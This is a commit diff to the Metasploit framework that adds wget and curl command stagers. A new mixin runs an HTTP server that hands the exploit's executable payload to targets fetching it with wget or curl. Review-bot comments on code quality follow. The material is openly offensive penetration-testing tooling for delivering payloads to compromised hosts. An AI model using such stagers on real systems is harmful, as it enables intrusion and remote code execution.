Land #7758, Add HTTP CmdStagers - wget and curl
commit
d2624ef574
|
@ -250,7 +250,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.4)
|
||||
rex-exploitation (0.1.7)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
|
|
@ -1,8 +1,7 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/exploitation/cmdstager'
|
||||
require 'msf/core/exploit/exe'
|
||||
require 'msf/base/config'
|
||||
require 'msf/core/exploit/cmdstager/http'
|
||||
|
||||
module Msf
|
||||
|
||||
|
@ -10,6 +9,7 @@ module Msf
|
|||
module Exploit::CmdStager
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::CmdStager::Http
|
||||
|
||||
# Constant for stagers - used when creating an stager instance.
|
||||
STAGERS = {
|
||||
|
@ -21,7 +21,9 @@ module Exploit::CmdStager
|
|||
:vbs => Rex::Exploitation::CmdStagerVBS,
|
||||
:vbs_adodb => Rex::Exploitation::CmdStagerVBS,
|
||||
:certutil => Rex::Exploitation::CmdStagerCertutil,
|
||||
:tftp => Rex::Exploitation::CmdStagerTFTP
|
||||
:tftp => Rex::Exploitation::CmdStagerTFTP,
|
||||
:wget => Rex::Exploitation::CmdStagerWget,
|
||||
:curl => Rex::Exploitation::CmdStagerCurl
|
||||
}
|
||||
|
||||
# Constant for decoders - used when checking the default flavor decoder.
|
||||
|
@ -124,6 +126,11 @@ module Exploit::CmdStager
|
|||
end
|
||||
|
||||
self.stager_instance = create_stager
|
||||
|
||||
if stager_instance.respond_to?(:http?) && stager_instance.http?
|
||||
opts[:payload_uri] = start_service(opts)
|
||||
end
|
||||
|
||||
cmd_list = stager_instance.generate(opts_with_decoder(opts))
|
||||
|
||||
if cmd_list.nil? || cmd_list.length.zero?
|
||||
|
|
|
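Review bot: `include Msf::Exploit::CmdStager::Http` near the top of `Exploit::CmdStager` is unconditional, so every module that mixes in CmdStager now also pulls in `Msf::Exploit::Remote::HttpServer` and the `'Stance' => Msf::Exploit::Stance::Aggressive` entry from the new Http mixin's `initialize`, even when it only uses a non-HTTP flavor such as `:vbs` or `:tftp`. That presumably changes the options and stance those modules report, so it should either be confirmed as intended or documented above the include, e.g. `# Mixed in for every flavor; only stagers that answer http? start the HTTP service`. In the last hunk, `opts[:payload_uri] = start_service(opts)` writes into the hash the caller passed in. The enclosing method starts outside the hunk, so whether `opts` was copied earlier cannot be seen here and should be checked.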
@ -0,0 +1,38 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core/exploit/tcp_server'
|
||||
require 'msf/core/exploit/http/server'
|
||||
|
||||
module Msf::Exploit::CmdStager
|
||||
module Http
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive
|
||||
))
|
||||
end
|
||||
|
||||
def start_service(opts = {})
|
||||
datastore_ssl = datastore['SSL']
|
||||
datastore['SSL'] = !!opts[:ssl]
|
||||
|
||||
super
|
||||
|
||||
payload_uri = get_uri
|
||||
datastore['SSL'] = datastore_ssl
|
||||
|
||||
payload_uri
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request['User-Agent'] =~ /^(?:Wget|curl)/
|
||||
send_response(cli, exe)
|
||||
else
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
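Review bot: `start_service` restores `datastore['SSL']` only on the success path, so if `super` or `get_uri` raises (for example when the listener cannot be started), the module is left with the overwritten SSL value. Moving the restore into an `ensure` clause fixes this without changing the return value: end the method body with `get_uri`, followed by `ensure` and `datastore['SSL'] = datastore_ssl`. The new mixin also has no comments; a short doc comment on `start_service` should say that `opts[:ssl]` temporarily overrides the datastore setting and that the method returns the payload URI. In `on_request_uri`, `\A` is the idiomatic start-of-string anchor, since `^` matches at any line start in Ruby.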